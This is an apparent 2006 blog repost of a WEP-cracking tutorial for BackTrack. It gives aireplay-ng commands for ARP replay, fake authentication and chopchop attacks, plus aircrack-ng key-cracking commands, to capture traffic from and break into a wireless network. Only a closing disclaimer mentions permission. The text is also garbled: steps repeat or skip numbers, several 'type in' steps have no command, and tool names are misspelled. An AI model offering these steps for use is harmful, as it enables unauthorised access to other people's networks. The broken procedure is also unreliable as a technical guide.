Professional Documents
Culture Documents
Hacking Wep
Hacking Wep
7 08 2006
I just cut and pasted the whole article. Namely because this is a great guide. I have seen many many
screenrecord guides and a whoel video on the subject, but the hard text is way more helpful. BTW -
Backtrack has its final release out now. It so totally rocks.
2. Install BackTrack to your hd or just boot the live cd (username: root, password: toor; Don’t froget to
start the gui: type in startx on the command lien after logging in).
* to find out what your wireless interface is, type iwconfig and press enter. All interfaces will show up
(mine is ath0).
4. Start airodump by typing in the terminal (press enter after typing it in)
5. When airodump found the network you want to hack it’ll show up. Note the BSSID (acces point’s
mac address) and the SSID (the access point’s name). Don’t close this terminal window or stop
airodump from running before you have the wep key!
##### Generating data, method one: There are clients visible in airodump associated to the network
#####
1. Open a new terminal window and type in (press enter after typing in):
aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the
BSSID you found wth airodump] -h 01:02:03:04:05:06
2. Open another new terminal window and type in (press enter after typing in):
##### Generating data, method two: There are NO clients visible in airodump associated to the
network #####
1. Open a new terminal window and type in (do NOT press the enter button!)
aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the
BSSID you found wth airodump] -h 01:02:03:04:05:06
2. Open another new terminal window and type in (do NOT press the enter button!):
aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID
you found wth airodump] -h 01:02:03:04:05:06
3. Press enter in the fakeauth terminal and after it started to fakeauth, press enter as quickly as possible
in the arpreplay window.
3. Open another new terminal window and type in (press enter after typing in):
4. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you
have around 500k of data, go to the cracking step of this tutorial.
##### If the above two methods aren’t working, try this #####
1. Open a new terminal window and type in (press the enter button after typing it in):
aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID
you found wth airodump] -h 01:02:03:04:05:06
2. Open another new terminal window and type in (press the enter button after typing it in):
aireplay-ng [wireless interface] –chopchop -e [the SSID which you found with airodump] -b [the
BSSID you found wth airodump] -h 01:02:03:04:05:06
3. The chopchop starts reading packages. When it finds one, it’ll ask you to use it. Choose yes. Wait a
few seconds/minutes and remember the filename that is given to you at the end.
4. Open Ethereal (click the icon in the bottom left corner > Backtrack > Sniffers > Ethereal) and open
the xor file made with the chopchop attack in Ethereal (it’s located in the home folder)
5. Look with Ethereal in the captured file. Try to find the source ip and the destination ip: write those
addresses down somewhere.
5. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you
have around 500k of data, go to the cracking step of this tutorial.
or
airecrack-ng -n 128 capture-01.ivs (for a 128 bits encryption, enter after typing)
If you don’t know how strong the encryption is, type in both in different terminals and start a third
terminal. Type in this code:
airecrack-ng capture-01.ivs
2. Wait a few minutes. Check the terminal(s). The code will automaticly show up if found. Keep
airodump running!
DISLAIMER:I don’t think I have to mention that you need written permission from the owner of the
network before you are allowed to start cracking his wep or even before you are allowed to capture
packages. Just try it with your own network. You’ll learn a lot about it. But never ever try it with
another network than your own.
I’ve done it to my own WiFi at home and the simplicity of it is mind boggling. My philosophy is that
the more people have out there that shows the lask of security, the more the security ware people will
actually make there apps/hardware/code secure.
This text “how to” may be a bit confusing because you can’t see the command line, for us visual
learners that is a bit of a handicap. So I hunted around for the old whoppix wep cracking AVI. Every
link I could find that took me to a direct view of the video (originally presented in flash) was dead so I
found a place to DL the actualy file. I wanted to preseve the best quality so I just posted it for
download. Click the link below to DL the ORIGINAL video file from rapidshare. (BTW - its around
50mb)